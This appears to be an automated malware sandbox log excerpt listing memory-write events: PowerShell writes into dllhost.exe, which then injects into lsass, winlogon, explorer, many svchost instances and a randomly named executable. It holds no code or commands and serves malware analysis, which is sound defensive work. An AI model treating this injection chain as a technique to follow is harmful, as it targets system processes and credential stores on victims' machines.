Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 6F6794F010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: C085B89010
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDA0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F0A6330000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 29166940000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29D00000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3400000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2538D0F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 194B7F40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27555FD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 2DFC7040000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 4200000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 29A023B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A648070000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E990500000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1887F5C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 219111D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2570000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2930000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D00000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2750000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 28B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 940000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2330000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: BD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: FF0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 27D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 25D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2920000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2390000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2740000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: B50000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2550000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 7F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 9F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 12F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2600000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2500000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2820000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2510000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2220000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D90000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 720000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: AA0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2E70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E00000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 880000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 690000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2840000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2E30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A20000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: C30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 910000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 23A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2310000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 29C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 1500000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2900000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2BB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 25D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2130000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E50000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2610000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A20000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 8D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2360000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 29C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 20C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 27F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 15B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 12D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2FE0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 1480000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 14F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2BC0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: F50000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2EF0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 22F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 900000
